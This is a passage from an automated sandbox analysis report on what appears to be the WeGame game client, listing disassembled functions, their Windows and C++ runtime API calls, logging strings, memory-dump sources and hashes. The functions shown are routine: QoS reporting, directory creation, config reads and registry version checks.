                                                                  • Part of subcall function 6BD31899: _Mtx_lock.MSVCP140(00000000,?,?,6BD9B017,?,1F5A0D44,?,?,00000001,00000000,6BF8B63F,000000FF,?,6BD96570,00000001,6BD43A1D), ref: 6BD318A0
                                                                  • Part of subcall function 6BD31899: ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000,?,?,6BD9B017,?,1F5A0D44,?,?,00000001,00000000,6BF8B63F,000000FF,?,6BD96570,00000001,6BD43A1D), ref: 6BD318AD
                                                                • memmove.VCRUNTIME140(?,00000000,?,1F5A0D44,?,?,00000001,00000000,6BF8B63F,000000FF,?,6BD96570,00000001,6BD43A1D,00000000,00000003), ref: 6BD9B02A
                                                                • std::_Cnd_initX.LIBCPMT ref: 6BD9B057
                                                                  • Part of subcall function 6BD318B8: _Mtx_unlock.MSVCP140(?,?,?,6BD9B05C,?,?,?,00000002,00000000), ref: 6BD318BF
                                                                  • Part of subcall function 6BD318B8: ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000,?,?,6BD9B05C,?,?,?,00000002,00000000), ref: 6BD318CC
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,00000002,00000000), ref: 6BD9B05D
                                                                  • Part of subcall function 6BD1A5EF: __EH_prolog3.LIBCMT ref: 6BD1A5F6
                                                                  • Part of subcall function 6BD2A76F: __EH_prolog3_GS.LIBCMT ref: 6BD2A776
                                                                  • Part of subcall function 6BD2F706: __EH_prolog3_GS.LIBCMT ref: 6BD2F70D
                                                                Strings
                                                                • [Qos_http_handler]report qos id= %d, xrefs: 6BD9B0A5
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\qos_http_handler.cpp, xrefs: 6BD9B086
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: C_error@std@@Cnd_initH_prolog3_Throw_std::_$?get_log_instance@base@@H_prolog3Logger@1@Mtx_lockMtx_unlockmemmove
                                                                • String ID: [Qos_http_handler]report qos id= %d$e:\dailybuild_dev\wegame_client\codes\common\src\qos_http_handler.cpp
                                                                • API String ID: 489467989-4170343553
                                                                • Opcode ID: c1e0e6d7f83c15e7f46d0532144e0c3ff300764aef34a634c065164ed5ca50bc
                                                                • Instruction ID: 6131bbed8526ec7bb5eb92a3cf900b5e39b1190b80945269811729a4df164281
                                                                • Opcode Fuzzy Hash: c1e0e6d7f83c15e7f46d0532144e0c3ff300764aef34a634c065164ed5ca50bc
                                                                • Instruction Fuzzy Hash: 9D41CE71904258AFCB09DFB4C851BEDBBB4EF05328F1041A9D515AB2C1DB799B05CB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD9B3CC Relevance: 10.6, APIs: 7, Instructions: 104COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.VCRUNTIME140(?,00000000,00004EAE,1F5A0D44,?,?,?,?,6BF8B6C2,000000FF), ref: 6BD9B41B
                                                                • std::_Cnd_initX.LIBCPMT ref: 6BD9B42A
                                                                  • Part of subcall function 6BD31899: _Mtx_lock.MSVCP140(00000000,?,?,6BD9B017,?,1F5A0D44,?,?,00000001,00000000,6BF8B63F,000000FF,?,6BD96570,00000001,6BD43A1D), ref: 6BD318A0
                                                                  • Part of subcall function 6BD31899: ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000,?,?,6BD9B017,?,1F5A0D44,?,?,00000001,00000000,6BF8B63F,000000FF,?,6BD96570,00000001,6BD43A1D), ref: 6BD318AD
                                                                • memmove.VCRUNTIME140(?,-00000008,00004EAE), ref: 6BD9B457
                                                                • std::_Cnd_initX.LIBCPMT ref: 6BD9B47F
                                                                • std::_Cnd_initX.LIBCPMT ref: 6BD9B49C
                                                                • memmove.VCRUNTIME140(?,-00000008,00004EAE), ref: 6BD9B4CA
                                                                • std::_Cnd_initX.LIBCPMT ref: 6BD9B4F8
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Cnd_initstd::_$memmove$C_error@std@@Mtx_lockThrow_memset
                                                                • String ID:
                                                                • API String ID: 4086104158-0
                                                                • Opcode ID: e719f286e13af852c052041d41687fccd8f82c9c21057ee0f11648cacec26471
                                                                • Instruction ID: d0e67e6aca6b83f74152140a243c5c5d62a18d9cfecb9940624ac9b483887a42
                                                                • Opcode Fuzzy Hash: e719f286e13af852c052041d41687fccd8f82c9c21057ee0f11648cacec26471
                                                                • Instruction Fuzzy Hash: 9E4165B1D00269EADF14DB64DC85F89BBB8FF05314F1002E5E608AB1C1D7B95A458F65
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD5F78D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 84COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD5F794
                                                                • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(6BD43A1D,00000000,00000038,6BD94C44,?,?,?), ref: 6BD5F7BF
                                                                  • Part of subcall function 6BDAB9D8: __EH_prolog3_GS.LIBCMT ref: 6BDAB9DF
                                                                • GetFileVersionInfoSizeW.VERSION(00000000,00000000,00000038,6BD94C44,?,?,?), ref: 6BD5F7E5
                                                                  • Part of subcall function 6BD5F669: __EH_prolog3_catch.LIBCMT ref: 6BD5F670
                                                                  • Part of subcall function 6BD28DF0: __EH_prolog3_catch.LIBCMT ref: 6BD28DF7
                                                                • GetFileVersionInfoW.VERSION(00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,00000000,00000038,6BD94C44,?,?,?), ref: 6BD5F826
                                                                • VerQueryValueA.VERSION(?,6BFA5D78,?,00000034,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,00000000,00000038,6BD94C44), ref: 6BD5F83F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: FileH_prolog3_H_prolog3_catchInfoVersion$?u8to16@common@ierd_tgp@@D@2@@std@@D@std@@QuerySizeU?$char_traits@U?$char_traits@_V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_ValueW@2@@4@@W@std@@
                                                                • String ID: 4
                                                                • API String ID: 3447756801-4088798008
                                                                • Opcode ID: d686ea33dd042b5bc3e137156ef4774c4dc0917edfb75ca277e4e63dc672115f
                                                                • Instruction ID: 69436352b2b3326c4e1f75c4b3d773289f9ebbed9c2a44217286bbc049717aa7
                                                                • Opcode Fuzzy Hash: d686ea33dd042b5bc3e137156ef4774c4dc0917edfb75ca277e4e63dc672115f
                                                                • Instruction Fuzzy Hash: 47316D75901249EECF04CFE4C5819EEBBB9AF18324F64406DE854FB250EB35AA45CB74
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BDBA70E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BDBA718
                                                                • SHCreateDirectoryExW.SHELL32(00000000,00000008,00000000,0000010C,6BD49EFB,?,?,?,0000018C,6BD4A681,?,?,?,?,00000000,00000200), ref: 6BDBA72F
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BDBA7A7
                                                                Strings
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\sys_wrapper.cpp, xrefs: 6BDBA7CB
                                                                • create_directory_ex fail, error code:%1%, path:%2%, xrefs: 6BDBA74E
                                                                • [Sys_wrapper]%s, xrefs: 6BDBA7EB
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@CreateDirectoryH_prolog3_Logger@1@
                                                                • String ID: [Sys_wrapper]%s$create_directory_ex fail, error code:%1%, path:%2%$e:\dailybuild_dev\wegame_client\codes\common\src\sys_wrapper.cpp
                                                                • API String ID: 4165533739-2213886048
                                                                • Opcode ID: eb733254ae7971b69371266d68e40124cd8343ea6f887bd6ef51936b2da2762a
                                                                • Instruction ID: 8bee3e4605581d5453ff639839b6787ce2e00e38edbb28b37b2f21d010f4db57
                                                                • Opcode Fuzzy Hash: eb733254ae7971b69371266d68e40124cd8343ea6f887bd6ef51936b2da2762a
                                                                • Instruction Fuzzy Hash: 3521BFB1C00208DBDB29DB74CC56AEE77B4AF15728F10459CD4426B181EF78AB45CBB1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD1C484 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 79COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 6BD1C48E
                                                                  • Part of subcall function 6BD19A0E: __EH_prolog3.LIBCMT ref: 6BD19A15
                                                                  • Part of subcall function 6BD0A8F0: memmove.VCRUNTIME140(?,?,6BD15839,?,?,00000000,?,?,6BD15839,?,?), ref: 6BD0A917
                                                                • ?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N@Z.COMMON(?,?,00000000,user_setting.settings.common.last_uin,00000025,?,?,?,?,?,?,00000094), ref: 6BD1C4DA
                                                                  • Part of subcall function 6BD4702B: __EH_prolog3_catch_GS.LIBCMT ref: 6BD47035
                                                                  • Part of subcall function 6BD4702B: ?split_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV34@1@Z.COMMON(?,?,?), ref: 6BD4709A
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BD1C598
                                                                  • Part of subcall function 6BD1776B: __EH_prolog3.LIBCMT ref: 6BD17772
                                                                  • Part of subcall function 6BD1776B: ?_Init@locale@std@@CAPAV_Locimp@12@_N@Z.MSVCP140(00000001,?,?,?,?,00000008,6BD1C504), ref: 6BD17789
                                                                Strings
                                                                • user_setting.settings.common.last_uin, xrefs: 6BD1C4C0
                                                                • [QQListFetcher]Get last login UIN: %llu success., xrefs: 6BD1C5D5
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\qqlistfetcher.cpp, xrefs: 6BD1C5BC
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$D@2@@std@@$H_prolog3H_prolog3_catch_$?get_cfg_by_path@common@ierd_tgp@@?get_log_instance@base@@?split_path@common@ierd_tgp@@D@2@@std@@@2@@property_tree@boost@@_Init@locale@std@@Locimp@12@_Logger@1@U?$less@V12@V34@1@V?$basic_ptree@memmove
                                                                • String ID: [QQListFetcher]Get last login UIN: %llu success.$e:\dailybuild_dev\wegame_client\codes\common\src\qqlistfetcher.cpp$user_setting.settings.common.last_uin
                                                                • API String ID: 350412807-3646873806
                                                                • Opcode ID: 1cdac48fd9ef56d535d5f4fd00c6254b87658afbbdfcef2a48fc704244f7e1f9
                                                                • Instruction ID: 86ef7a5ba790d61d72962009ea3a4799e92275b6ff40ec1a061c2e4def9bee1f
                                                                • Opcode Fuzzy Hash: 1cdac48fd9ef56d535d5f4fd00c6254b87658afbbdfcef2a48fc704244f7e1f9
                                                                • Instruction Fuzzy Hash: 8631B131D14248EAEB14DBB8C885BDDBB706F15318F5480A8D1147B292EB785B4ACF60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD1C60A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 69COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 6BD1C614
                                                                  • Part of subcall function 6BD19A0E: __EH_prolog3.LIBCMT ref: 6BD19A15
                                                                  • Part of subcall function 6BD0A8F0: memmove.VCRUNTIME140(?,?,6BD15839,?,?,00000000,?,?,6BD15839,?,?), ref: 6BD0A917
                                                                • ?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N@Z.COMMON(?,?,00000000,user_setting.settings.common.last_wegame_id,0000002B,?,?,?,?,?,?,00000090), ref: 6BD1C65B
                                                                  • Part of subcall function 6BD4702B: __EH_prolog3_catch_GS.LIBCMT ref: 6BD47035
                                                                  • Part of subcall function 6BD4702B: ?split_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV34@1@Z.COMMON(?,?,?), ref: 6BD4709A
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BD1C68B
                                                                  • Part of subcall function 6BD17657: __EH_prolog3.LIBCMT ref: 6BD1765E
                                                                  • Part of subcall function 6BD17657: ?_Init@locale@std@@CAPAV_Locimp@12@_N@Z.MSVCP140(00000001,?,?,?,?,00000008,6BD1C681), ref: 6BD17675
                                                                Strings
                                                                • [QQListFetcher]GetLastLoginedWegameId: {}, xrefs: 6BD1C6CD
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\qqlistfetcher.cpp, xrefs: 6BD1C6AF
                                                                • user_setting.settings.common.last_wegame_id, xrefs: 6BD1C641
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$D@2@@std@@$H_prolog3H_prolog3_catch_$?get_cfg_by_path@common@ierd_tgp@@?get_log_instance@base@@?split_path@common@ierd_tgp@@D@2@@std@@@2@@property_tree@boost@@_Init@locale@std@@Locimp@12@_Logger@1@U?$less@V12@V34@1@V?$basic_ptree@memmove
                                                                • String ID: [QQListFetcher]GetLastLoginedWegameId: {}$e:\dailybuild_dev\wegame_client\codes\common\src\qqlistfetcher.cpp$user_setting.settings.common.last_wegame_id
                                                                • API String ID: 350412807-312244829
                                                                • Opcode ID: e86ef43009dbbbfcfa304131c93267e011cd26487336f60fc32a9d48e9a0d242
                                                                • Instruction ID: 032c24cd06d43dcf520828cd7a5a767ce7f79939e0d6aaa1cb679ebed0430445
                                                                • Opcode Fuzzy Hash: e86ef43009dbbbfcfa304131c93267e011cd26487336f60fc32a9d48e9a0d242
                                                                • Instruction Fuzzy Hash: 1221E271D05208DADB14DFB8D892BDDBB706F15318F5440A8D1057F291DB794B4ADB60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00459753 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 0045975A
                                                                • ?unsetf@ios_base@std@@QAEXH@Z.MSVCP140(00000001,00000018,0046A145,?,?,00000020,00000040,00000001,?,85A35C35,?,?,?,?,?,0047B8A9), ref: 0045977D
                                                                • ?fail@ios_base@std@@QBE_NXZ.MSVCP140(00000001,?,?,?,?,?,0047B8A9,000000FF), ref: 004597B3
                                                                • ?bad@ios_base@std@@QBE_NXZ.MSVCP140(?,?,?,?,?,0047B8A9,000000FF), ref: 004597C4
                                                                • _CxxThrowException.VCRUNTIME140(?,0049C838,error reading stream,?,?,?,?,?,0047B8A9,000000FF), ref: 00459800
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?bad@ios_base@std@@?fail@ios_base@std@@?unsetf@ios_base@std@@ExceptionH_prolog3Throw
                                                                • String ID: error reading stream
                                                                • API String ID: 37477595-137694921
                                                                • Opcode ID: 69214339061e56e01eb8840e37e220b3278fa4887b5ca34e666984b5f1dd0b23
                                                                • Instruction ID: 302e12700053926fe24509606de076a1cb89f16fc2c85d9e56eda33311c29ac4
                                                                • Opcode Fuzzy Hash: 69214339061e56e01eb8840e37e220b3278fa4887b5ca34e666984b5f1dd0b23
                                                                • Instruction Fuzzy Hash: B4215635A006059FCF04EFA9C959AADBBF1EF18304B14846EE449E7252CB389A45CB59
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BDBBDD8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegOpenKeyExA.KERNEL32(80000002,Software\Microsoft\Internet Explorer,00000000,00020019,?), ref: 6BDBBE09
                                                                • memset.VCRUNTIME140(?,00000000,00000104), ref: 6BDBBE2D
                                                                • RegQueryValueExA.KERNEL32(?,Version,00000000,?,?,?), ref: 6BDBBE56
                                                                • RegCloseKey.KERNEL32(?), ref: 6BDBBE62
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CloseOpenQueryValuememset
                                                                • String ID: Software\Microsoft\Internet Explorer$Version
                                                                • API String ID: 1830152886-2486530099
                                                                • Opcode ID: b8f499f18f3953360486d643dba89dcac38f1e09ab2661bb2bf19e7e01396311
                                                                • Instruction ID: 217337a65135de06f55f589f251c40435b945643076e353b29da452ba16bf251
                                                                • Opcode Fuzzy Hash: b8f499f18f3953360486d643dba89dcac38f1e09ab2661bb2bf19e7e01396311
                                                                • Instruction Fuzzy Hash: 3F118E7690011CABDF15DF25CC45EDABB7CEB85304F0041D9AA49E7010DA749A89CFA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BDCF356 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BDCF35D
                                                                • ?unsetf@ios_base@std@@QAEXH@Z.MSVCP140(00000001,00000018,6BDD1ACE,?,00000000,00000020,00000040,00000001,?,\mmog_data.xml,00000000,1F5A0D44,00000000,00000000,6BD43A1D), ref: 6BDCF380
                                                                • ?fail@ios_base@std@@QBE_NXZ.MSVCP140(?,?,?,00000000,00000001,?,00000000,6BF92607,000000FF,?,6BDD06F1,00000000,?), ref: 6BDCF3B6
                                                                • ?bad@ios_base@std@@QBE_NXZ.MSVCP140(?,00000000,6BF92607,000000FF,?,6BDD06F1,00000000,?), ref: 6BDCF3C7
                                                                • _CxxThrowException.VCRUNTIME140(?,6C062C5C,error reading stream,?,00000000,6BF92607,000000FF,?,6BDD06F1,00000000,?), ref: 6BDCF403
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?bad@ios_base@std@@?fail@ios_base@std@@?unsetf@ios_base@std@@ExceptionH_prolog3Throw
                                                                • String ID: error reading stream
                                                                • API String ID: 37477595-137694921
                                                                • Opcode ID: 501a3b880bdd0227d4ed5f3609f221c7ab62b6da0d79b99ab71675df73cf704d
                                                                • Instruction ID: f15bd7a93b5f9be93eebadf3949dd9644374eb81fb724414889f87be1f5e7c6a
